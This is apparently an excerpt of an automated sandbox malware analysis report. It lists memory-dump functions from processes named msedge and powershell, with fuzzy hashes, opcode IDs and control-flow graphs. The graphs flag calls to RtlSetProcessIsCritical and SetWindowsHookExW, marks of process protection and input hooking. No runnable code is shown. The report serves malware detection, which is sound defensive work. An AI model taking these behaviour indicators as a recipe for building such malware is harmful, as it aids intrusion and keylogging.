                                            • Instruction ID: 968faca629687d0ae49ca6976f84be4c2613aaed2efbe2b32f1866010558f2c4
                                            • Opcode Fuzzy Hash: d21cf00a55e69310f66aab8bebe1c94f377537ec06b319473ac5dbc34513089f
                                            • Instruction Fuzzy Hash: 9BB1E562B1DA494FE794EF6C98AA3B9B7D1FFA9310F04017AD04DC3293DE2868418791

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1116c8aa553013ef5c6562be7fa7385bd468ad4831fa21d4f72aeadb31eeb2d2
                                            • Instruction ID: adb235131f3848d458a82e2f2695cb30931a0fa89b44772347951f8aa2e046a3
                                            • Opcode Fuzzy Hash: 1116c8aa553013ef5c6562be7fa7385bd468ad4831fa21d4f72aeadb31eeb2d2
                                            • Instruction Fuzzy Hash: A4F18730A0CA4E4FEBA8DF28C8557E977E1FF55310F04426EE84DC7691DB78A9458B81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 209d80e8667f7f119ba3341f707a8ff1fc009f342a87278195ce0b411308446a
                                            • Instruction ID: c61d4857839e3aad618ca344460d3e2dad7ea4b5ca057dc1a902dd4386afa8ad
                                            • Opcode Fuzzy Hash: 209d80e8667f7f119ba3341f707a8ff1fc009f342a87278195ce0b411308446a
                                            • Instruction Fuzzy Hash: EBE1A430A0CA4D8FEBA8DF28C8657E977E1FF55310F14426ED84DC7291DE78A9458B81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e4be3ed71c1073624a9bd26bdfb77a379e23e19aacc28eaa0ee90b2e08f80f8
                                            • Instruction ID: 8af05a2294031472cdb2d4f691689d7e80246c7c9f6a2fa81373398de4e1a4dc
                                            • Opcode Fuzzy Hash: 0e4be3ed71c1073624a9bd26bdfb77a379e23e19aacc28eaa0ee90b2e08f80f8
                                            • Instruction Fuzzy Hash: 2251FF21B1E6C90FE796AB7898752B5BFD5DF87216B0805FFE0C9C61A3DD085806C342

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 542 7ffd34683bbd-7ffd34683ca0 RtlSetProcessIsCritical 546 7ffd34683ca2 542->546 547 7ffd34683ca8-7ffd34683cdd 542->547 546->547
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID: CriticalProcess
                                            • String ID:
                                            • API String ID: 2695349919-0
                                            • Opcode ID: 52beb9b9d557040c330236b1ee84b4b74a82466b3e4405131ee544930aa7562e
                                            • Instruction ID: 780263c413c452e89c8cef6eb9e2d52d977704eb9b56b563d87d556fcc203721
                                            • Opcode Fuzzy Hash: 52beb9b9d557040c330236b1ee84b4b74a82466b3e4405131ee544930aa7562e
                                            • Instruction Fuzzy Hash: C141033190C7588FD729DF98D859AE9BBF0EF56311F04416ED08AD3592CB38A846CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 549 7ffd34684378-7ffd3468437f 550 7ffd34684381-7ffd34684389 549->550 551 7ffd3468438a-7ffd3468439a 549->551 550->551 552 7ffd346843d0-7ffd346843fd 551->552 553 7ffd3468439c-7ffd346843cc 551->553 556 7ffd34684403-7ffd34684410 552->556 557 7ffd34684489-7ffd3468448d 552->557 553->552 558 7ffd34684412-7ffd3468444f SetWindowsHookExW 556->558 557->558 560 7ffd34684451 558->560 561 7ffd34684457-7ffd34684488 558->561 560->561
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 2e41ccb8aa2610ecdfce3f34429cd81e87c2b6ddd250cdb037934aebf1e63e98
                                            • Instruction ID: 7fe9bc81a2b0c8713dd5a3570327b2266efa09b1037f3b1cd92f69dd18ec88aa
                                            • Opcode Fuzzy Hash: 2e41ccb8aa2610ecdfce3f34429cd81e87c2b6ddd250cdb037934aebf1e63e98
                                            • Instruction Fuzzy Hash: F0311931A0CA5D4FDB5CEFAC98556F9BBE1EB59321F04423ED049D3192DE64A81287C1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 564 7ffd346837ca-7ffd346843fd 568 7ffd34684403-7ffd34684410 564->568 569 7ffd34684489-7ffd3468448d 564->569 570 7ffd34684412-7ffd3468444f SetWindowsHookExW 568->570 569->570 572 7ffd34684451 570->572 573 7ffd34684457-7ffd34684488 570->573 572->573
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2477346115.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34670000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f76b79323a09b7b6bcf2e56423b1fff90b154321f605f06c042000c0a4b7d0b2
                                            • Instruction ID: fd67157214bed037ee897f90e2d0518e99e9fe2040c3ca52ac410fdc3ac092de
                                            • Opcode Fuzzy Hash: f76b79323a09b7b6bcf2e56423b1fff90b154321f605f06c042000c0a4b7d0b2
                                            • Instruction Fuzzy Hash: 5A21E631A0CB4C8FDB59DFAC9C8A6E97FF0EB96321F04416BD448C3152DA759416CB92
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2478365148.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34740000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba6dc08fcef69ca27ed5b2d4a469743c4135739a719aaace6ac8c5f07c06fc61
                                            • Instruction ID: f63ffa33ae7809745c186084a48c7ed08821c11ffacf02146127e82296d16a43
                                            • Opcode Fuzzy Hash: ba6dc08fcef69ca27ed5b2d4a469743c4135739a719aaace6ac8c5f07c06fc61
                                            • Instruction Fuzzy Hash: D32109B2B0DA9A8FE7A5CB1C44E013476D2EF66210B5900BAC25EC73A3CD1CFC05A381
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2478365148.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34740000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2cc0fa9ba8dab7deccec2b2ff4a36b0f18a6bbc8d181e13760542a4533837fff
                                            • Instruction ID: 326014225c2d093dca8dc0ba8d6e9d60fe6802889837da8dee1cb3ecf802ad6c
                                            • Opcode Fuzzy Hash: 2cc0fa9ba8dab7deccec2b2ff4a36b0f18a6bbc8d181e13760542a4533837fff
                                            • Instruction Fuzzy Hash: 6511E372B0E6858FEBA4D72C84A45B87BD1EF06724B5800BAD15DD7293D91CBC00A381
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2477346115.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34670000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction ID: fbdbe5f7fa31bdb5b4d96766301e1fa8c3ecf2e6deba8f06807b4dcd50cf955b
                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction Fuzzy Hash: 5401677121CB0C4FD754EF0CE451AA5B7E0FB95364F10056DE58AC3691DA36E892CB45
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2477346115.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34670000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^4$M_^7$M_^F$M_^J
                                            • API String ID: 0-622050427
                                            • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                            • Instruction ID: 38742e96664be9460a50deb9f89d8f10413ba588710842848fc8c0f904a8889b
                                            • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                            • Instruction Fuzzy Hash: 692104B77086658ED3127BFDB8149EA3744CFA423978503B2E198DB083FD1860868AC0
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad6fc986f8a034576e9bf4e1a99370fc286ebbb443b37b43fa37f22866987ac7
                                            • Instruction ID: 801afc691ec4cee512c3affff126c17ceb82b84b6d81bd43f5956899ec52c3ff
                                            • Opcode Fuzzy Hash: ad6fc986f8a034576e9bf4e1a99370fc286ebbb443b37b43fa37f22866987ac7
                                            • Instruction Fuzzy Hash: D352D361B18A594FEBA8EB6884B53FDB7D2FF99300F54057DE04EC32D2DE68A8418741
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 200d644ca05818e01b3ee3b3bb59307a0619f156bbc8ed7345e582daed920b85
                                            • Instruction ID: 8e8aa7d129d7342c5f0f672ca5d5421842db4ddf5a430e63e23ef9e4c4014fa6
                                            • Opcode Fuzzy Hash: 200d644ca05818e01b3ee3b3bb59307a0619f156bbc8ed7345e582daed920b85
                                            • Instruction Fuzzy Hash: 2551FF21B1E6C90FE796ABB848752B5BFD5DF87216B1804FFE0C9C61A3DD585806C342
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8e6290b3c687636edeaf3916f6689141a3409757ea65d6f58a414bc6fbfc744
                                            • Instruction ID: 2b62b8a5cd4c40b6d7e651cd9a378be94cc8077a1908f499c12a72eeeb0a6d89
                                            • Opcode Fuzzy Hash: a8e6290b3c687636edeaf3916f6689141a3409757ea65d6f58a414bc6fbfc744
                                            • Instruction Fuzzy Hash: 80912922B1DA9A0FE756AB7C98B51F93BE1EF87211B0800BBD189C71A3DD5C68468351
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f3a74ef495120f3d1e45e1310898a7b03c5493960040c5f85ee2dde74b326d1
                                            • Instruction ID: 69d6cbbab2c93ac50815bb50d4cda2f7b6566ae992d400277980913d47a40281
                                            • Opcode Fuzzy Hash: 8f3a74ef495120f3d1e45e1310898a7b03c5493960040c5f85ee2dde74b326d1
                                            • Instruction Fuzzy Hash: 9F31A621B1D9490FF798FA6C946A2B9B7C2EF99316F1405BEE04EC3293DD68AC418341
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eceb83a4f91296ffd7e769f9b216da2a70cef2f9ba9fee9ec52ef26c3cc667e4
                                            • Instruction ID: 8b7cee4135f4c6bad19a491c289d78d9044207ac1b2ed366f7c77ad504511260
                                            • Opcode Fuzzy Hash: eceb83a4f91296ffd7e769f9b216da2a70cef2f9ba9fee9ec52ef26c3cc667e4
                                            • Instruction Fuzzy Hash: 8131D621B18E554BE754BBFC88693FEB6D5EFA9301F54017AE00DC32E2DE2868418791
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30a599ce6c3589d0c3080a51884d8af7043d72358438e5069389128009002663
                                            • Instruction ID: 5dc3e9eb9a462244f3d7bf36318a31f31a012dd78245b98933cdbc62c89e395e
                                            • Opcode Fuzzy Hash: 30a599ce6c3589d0c3080a51884d8af7043d72358438e5069389128009002663
                                            • Instruction Fuzzy Hash: C8419F31B18A5E8FEB44EBA8C4756EEBBA1FF99301F540579D009D32C6CE786841C740
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a53dea06a55216be889fd4a672981872bc196bff973ea36a85ff67b917f19b4
                                            • Instruction ID: ea3fad731278fd8a654fb38b6876143e2df110dc61145673888d03e2b650854f
                                            • Opcode Fuzzy Hash: 4a53dea06a55216be889fd4a672981872bc196bff973ea36a85ff67b917f19b4
                                            • Instruction Fuzzy Hash: C731CE20B5970E4FD755EFACD0B06AC7FB5AF88205BA444A9E44EC33C6DE247840C751
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ed241dd319cad67c4533075ea366b832d6a7958499b612f0905c63ae073db5b
                                            • Instruction ID: dc3fa5fbc65fb0d53d2630d338f1ba476cb953bc1ac447b0ecb3ad9b148063b6
                                            • Opcode Fuzzy Hash: 1ed241dd319cad67c4533075ea366b832d6a7958499b612f0905c63ae073db5b
                                            • Instruction Fuzzy Hash: 93014752E0DBD50EF781AF3858B10B53FE09BD2260B1806BBE48CC60E7DA486A418352
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 739b92926f089b209f8891955b5143fffa1766a637fc8f206645579c733fb943
                                            • Instruction ID: 2d5a7bb1fca01732c5bde5664523204c11f1a8e43e141e6178af5ad837b15cca
                                            • Opcode Fuzzy Hash: 739b92926f089b209f8891955b5143fffa1766a637fc8f206645579c733fb943
                                            • Instruction Fuzzy Hash: 9E52E261B58B594FEBE8EF6884B66F973D2EF99314F840579E44EC32C3DD28A8018741
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d9782796a8a16a9178841b7017dff5be1bdb077ac80c918ca99cd5b6429a97b
                                            • Instruction ID: c56a18b4485521ea1ded804d32bb03d0755fbc986b7bf8aae07b6b626aa6f235
                                            • Opcode Fuzzy Hash: 5d9782796a8a16a9178841b7017dff5be1bdb077ac80c918ca99cd5b6429a97b
                                            • Instruction Fuzzy Hash: B751FF21B1E6C90FE796AB7858752B5BFD5DF87216B0805FFE0C9C61A3DD085806C342
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 572681aae3536217d223fef365c2ba41ee545c2f0a0a92993d97153f565e0b12
                                            • Instruction ID: 2ab653eb12b7b9ce130b2452bb9d1d829d6e16e54248b6ae438516ded5e6a8f4
                                            • Opcode Fuzzy Hash: 572681aae3536217d223fef365c2ba41ee545c2f0a0a92993d97153f565e0b12
                                            • Instruction Fuzzy Hash: 15914821B0DB9A0FE796AB7C88B61F97BE1EF96211B0801FBD48DC7193DD1C68468351
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: efb6dad25b1a78584af9c849fe27d5320b64fb6ee260eb29d9cebbd0d1de3f5c
                                            • Instruction ID: 47b9435e5145ab6d4a8635ba1a2d20d10888fc9b15622db7a4deedd4d915fa28
                                            • Opcode Fuzzy Hash: efb6dad25b1a78584af9c849fe27d5320b64fb6ee260eb29d9cebbd0d1de3f5c
                                            • Instruction Fuzzy Hash: 0C317721B1D9490FE798FA6C946A2B9B7C2EFD9316F0405BEE44EC3293DD68AC418341
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5b29fb33c0d2b148201fbcd06bd32a1d04cb8aaced07c85f00d3fa4ab46d5ad
                                            • Instruction ID: 8d0274b767d7ad5f75e9afb6cdc7ffaea41474d7cf7a00f240792fd8e7d1ccf9
                                            • Opcode Fuzzy Hash: b5b29fb33c0d2b148201fbcd06bd32a1d04cb8aaced07c85f00d3fa4ab46d5ad
                                            • Instruction Fuzzy Hash: 5431C721B19A594FEB94BBFC88693BE77D5EFA9701F14027AE00DD32D3DD28A8018751
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e59f838ed5170d4d9273590b39ba116a9fb6a3d690cd5a023c77f4a6cec56635
                                            • Instruction ID: 2766bb6421a1dfc2a551a2d425292c885bfda2229697405e97cc34ff8fd63b47
                                            • Opcode Fuzzy Hash: e59f838ed5170d4d9273590b39ba116a9fb6a3d690cd5a023c77f4a6cec56635
                                            • Instruction Fuzzy Hash: AA41A270B58B5A4FEB84EBA8C4A56EA77E1FF98304F950579D009D3283CD3868058B40
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c20dad8b6bdfb58e90746adcc4bb41085917824bcbed43c5f9978ae410f81e9e
                                            • Instruction ID: 8be6a4c4135df343a7a0ba625c5883fef3769711b2c36d151ab5964bc52e4402
                                            • Opcode Fuzzy Hash: c20dad8b6bdfb58e90746adcc4bb41085917824bcbed43c5f9978ae410f81e9e
                                            • Instruction Fuzzy Hash: 1631F2317D874A5BD791FBA8D0E65F93BA1EF94228BC04678D84EC3387DE2468018B41
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dcc82695549b8c650489a627566ab3da12b4c893b0c89def84a9b55080b2a43d
                                            • Instruction ID: 37f9ff996815c3c22f656e2b844b57b70e2f5b113056feb16dc5c6ef5a2919a8
                                            • Opcode Fuzzy Hash: dcc82695549b8c650489a627566ab3da12b4c893b0c89def84a9b55080b2a43d
                                            • Instruction Fuzzy Hash: 3331C2207D87895FD392EFA8D0E56F93FB1EF98218BC045A9D84EC3397DE2469048B51
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3973c04ed7a18141cdf6962aad89ad1e6d6009c2ef637c6f8a2f86fdae6c5139
                                            • Instruction ID: a55ff78f871464221e6ecb5b1ffeedc61af437e940b80d1dd86be5d2f678b306
                                            • Opcode Fuzzy Hash: 3973c04ed7a18141cdf6962aad89ad1e6d6009c2ef637c6f8a2f86fdae6c5139
                                            • Instruction Fuzzy Hash: 33014751A0CBD10FE7C2AB3858A10F13FE09FD2260B0806BBE88CC60E3D908A9458342
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c802cca9b3fce1c1b8488008fdc8d0bf7a59ee78eb25c9c8953a295650d55d8
                                            • Instruction ID: 2b34c3d9cb91c443a8abecd4e26f598f1e10bbb160ed8637b56f9e0b928122ea
                                            • Opcode Fuzzy Hash: 3c802cca9b3fce1c1b8488008fdc8d0bf7a59ee78eb25c9c8953a295650d55d8
                                            • Instruction Fuzzy Hash: 9E52D461B18A194FEBA4FB6884B93F977D2FF99300F54057DE04EC32D6DE68A8428741
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ade26dea2e5b6ce37f935c397327e03108044fe5b87e82c27d3fad6b5ad7a21
                                            • Instruction ID: a75887da9b09ebdc6d955fa61c751f68a1a4ed37c2c3b696187ed881e691d29b
                                            • Opcode Fuzzy Hash: 1ade26dea2e5b6ce37f935c397327e03108044fe5b87e82c27d3fad6b5ad7a21
                                            • Instruction Fuzzy Hash: B451FF21B1E6C50FE796ABB848752B5BFD5DF87216B1804FFE0C9C61A3DD585806C342
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af11be0e2e85095df22228e97ad17857eabb524c50609de3ee9c79d7e34472d3
                                            • Instruction ID: c61dab9f46c9f73c26e849a59a452f4e1d4813e7d277266ebd502cf4652c97ec
                                            • Opcode Fuzzy Hash: af11be0e2e85095df22228e97ad17857eabb524c50609de3ee9c79d7e34472d3
                                            • Instruction Fuzzy Hash: 00914D21B1DA9A0FE755AB7C98B61F93BE1EF87211B0400BBD08DC71A3DD5C68468351
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab75423b79a9c29823944103c8571c968b08355e952747212de81851fe3c2bda
                                            • Instruction ID: 957bca037defaa29c014dd148f0d68379fb520e0aa0c2193dff04619c089a158
                                            • Opcode Fuzzy Hash: ab75423b79a9c29823944103c8571c968b08355e952747212de81851fe3c2bda
                                            • Instruction Fuzzy Hash: 7131A821B1C9490FF798FA6C946A2B9B7C2EF99315F1405BEE04EC3293DD68AC418341
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eceb83a4f91296ffd7e769f9b216da2a70cef2f9ba9fee9ec52ef26c3cc667e4
                                            • Instruction ID: 8b7cee4135f4c6bad19a491c289d78d9044207ac1b2ed366f7c77ad504511260
                                            • Opcode Fuzzy Hash: eceb83a4f91296ffd7e769f9b216da2a70cef2f9ba9fee9ec52ef26c3cc667e4
                                            • Instruction Fuzzy Hash: 8131D621B18E554BE754BBFC88693FEB6D5EFA9301F54017AE00DC32E2DE2868418791
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9400c25a310b52f6b1ccb5c2884951435303be5ab9e22e9555a53bbfd663c67
                                            • Instruction ID: 3bfb329ebe6885d5517259e1dc7ffdbea74f4eb79f78caa04ce51f8eb9be3595
                                            • Opcode Fuzzy Hash: e9400c25a310b52f6b1ccb5c2884951435303be5ab9e22e9555a53bbfd663c67
                                            • Instruction Fuzzy Hash: 6D419335B18A5A4FEB45FBA8C4796EA7BA1FF99300F944579D009E3286CE396841CB40
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
